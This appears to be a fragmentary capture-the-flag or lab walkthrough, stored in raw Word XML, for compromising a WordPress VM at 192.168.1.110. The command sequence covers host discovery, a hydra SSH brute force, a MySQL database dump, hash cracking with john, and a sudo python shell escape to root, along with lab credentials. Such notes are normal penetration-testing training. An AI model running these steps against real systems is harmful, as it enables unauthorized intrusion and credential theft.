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Target1 vagrant:tnargav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ip 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fping -a -g 192.168.1.0/24 &gt; fping.txt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nmap -sS -A -p- -oN nmap.txt -iL fping.txt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dirb </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.1.110</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wpscan --url http://192.168.1.110/wordpress --force -v</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">hydra 192.168.1.110 -l “michael” -P /usr/share/wordlists/rockyou.txt ssh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ssh michael@192.168.1.110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cd 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find / -name *flag* 2&gt;/dev/null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Cat /var/www/flag2.txt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Database root:R@v3nSecurity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mysqldump -u root -p wordpress &gt; wordpress.sql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wget http://192.168.1.110/wordpress/wordpress.sql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cat wordpress.sql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echo password hashes to file hashes.txt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john --wordlist=rockyou.txt hashes.txt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steven:pink84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su steven</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">sudo -l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sudo python -c ‘import os; os.execl(“/bin/bash”, “bash”, “-p)’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find / -name flag* 2&gt;/dev/null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grep ‘flag’ wordpress.sql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Flag 1 inspect source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